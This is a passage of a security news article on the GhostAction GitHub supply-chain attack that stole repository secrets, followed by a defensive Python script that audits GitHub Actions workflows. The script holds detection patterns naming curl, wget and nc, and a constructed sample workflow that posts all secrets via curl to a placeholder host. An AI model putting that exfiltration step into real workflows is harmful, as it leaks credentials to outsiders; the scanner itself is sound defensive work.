Threat contained within days: GitGuardian's security team responded quickly after detection, and the FastUUID package was set to read-only by PyPI administrators within minutes. The malicious commit was reverted shortly afterward. GitGuardian notified maintainers of the affected repositories, successfully contacting 573 projects, and also alerted the GitHub, npm, and PyPI security teams so they could monitor for abuse.

Although no malicious packages had yet been published to the official registries, GitGuardian reported that some packages were potentially still at risk. "From our initial investigations, so far, 9 npm and 15 PyPI packages are at risk of compromise in the next hours or days," the researchers said.

The blog post shared a list of indicators of compromise, including network and GitHub Workflow indicators. For additional protection, the researchers emphasized the importance of reviewing repository workflows, rotating exposed credentials, and adopting stricter controls for GitHub Actions to prevent similar incidents in the future.

Package ecosystems like npm and PyPI remain frequent targets because of their popularity and broad reach within the developer community. Beyond publishing malicious packages directly, as in the recent npm reconnaissance campaign, attackers have also used techniques such as typosquatting (creating look-alike packages) and even exploiting AI-hallucinated dependencies to trick developers into installing compromised code.
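The workflow review the researchers recommend can be partly automated. The script below is an added example written for this page; it is not GitGuardian's tooling, not the published indicators of compromise, and not CSO's code. It applies three generic checks to a GitHub Actions workflow file: actions referenced by a mutable tag instead of a full commit SHA, a step that serializes the whole secrets context with `toJSON(secrets)`, and a step that mixes a secrets expression with a network client such as `curl`. The two workflow texts are constructed for the example (the action names are real, the `example.invalid` hostname and the SHAs are placeholders), and the line-based step splitter is a deliberate simplification so the script runs on the standard library alone without a YAML parser.

```python
import re
from typing import List, Tuple

# --- detection patterns ------------------------------------------------------
SHA_RE = re.compile(r"^[0-9a-f]{40}$")                       # full-length commit SHA
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)", re.M)     # 'uses: owner/repo@ref'
SECRET_RE = re.compile(r"\$\{\{[^}]*\bsecrets\b[^}]*\}\}")    # any ${{ ... secrets ... }}
DUMP_RE = re.compile(r"toJSON\(\s*secrets\s*\)", re.I)        # dumps every secret at once
NET_RE = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest)\b")


def split_steps(text: str) -> List[str]:
    """Cut a workflow into the text of each '- ...' item listed under 'steps:'.

    Simplified line-based splitting (no YAML library): a step starts at a
    '- ' line at the indent of the first step and ends at the next one, or
    when the text dedents back out of the steps list.
    """
    steps, current, step_indent, in_steps = [], None, None, False
    for line in text.splitlines():
        stripped = line.lstrip()
        indent = len(line) - len(stripped)
        if stripped.startswith("steps:"):
            in_steps, step_indent, current = True, None, None
            continue
        if not in_steps:
            continue
        if stripped.startswith("- ") and (step_indent is None or indent == step_indent):
            step_indent = indent
            if current:
                steps.append("\n".join(current))
            current = [line]
        elif step_indent is not None and stripped and indent <= step_indent:
            if current:                      # left the steps list (next job, top-level key)
                steps.append("\n".join(current))
            current, in_steps = None, False
        elif current is not None:
            current.append(line)
    if current:
        steps.append("\n".join(current))
    return steps


def audit_workflow(text: str) -> List[Tuple[str, str]]:
    """Return (finding-kind, detail) pairs for the risky patterns described above."""
    findings: List[Tuple[str, str]] = []
    if not re.search(r"^\s*permissions:", text, re.M):
        findings.append(("no-permissions-block",
                         "GITHUB_TOKEN falls back to the repository default scope"))
    for step in split_steps(text):
        label = step.strip().splitlines()[0]
        m = USES_RE.search(step)
        if m:
            ref = m.group(1)
            if not ref.startswith(("./", "docker://")):   # local and image refs are not tag-pinned
                version = ref.rpartition("@")[2] if "@" in ref else ""
                if not SHA_RE.match(version):
                    findings.append(("unpinned-action", ref))
        if DUMP_RE.search(step):
            findings.append(("secrets-dump", label))
        if "run:" in step and NET_RE.search(step) and SECRET_RE.search(step):
            findings.append(("secret-to-network", label))
    return findings


# Constructed sample: a workflow that exfiltrates the secrets context (not a real IoC).
SAMPLE_WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c
      - name: Run tests
        run: pytest
      - name: Collect build info
        env:
          ALL_SECRETS: ${{ toJSON(secrets) }}
        run: |
          curl -s -X POST -d "$ALL_SECRETS" https://ci-telemetry.example.invalid/collect
"""

# Constructed sample: the same job with least-privilege token scope and SHA-pinned actions.
HARDENED_WORKFLOW = """\
name: ci
on: [push]
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11
      - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c
      - name: Run tests
        run: pytest
"""

if __name__ == "__main__":
    for name, wf in (("sample", SAMPLE_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(name, audit_workflow(wf) or "no findings")
```

Run it over every file under `.github/workflows/` of the repositories you maintain; a hit on `secrets-dump` or `secret-to-network` in a commit you did not author is the kind of change worth reverting and treating as a credential exposure, and every secret that workflow could read should be rotated regardless of whether the exfiltration succeeded.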
First seen on csoonline.com
Jump to article: www.csoonline.com/article/4052826/ghostaction-campaign-steals-3325-secrets-in-github-supply-chain-attack.html

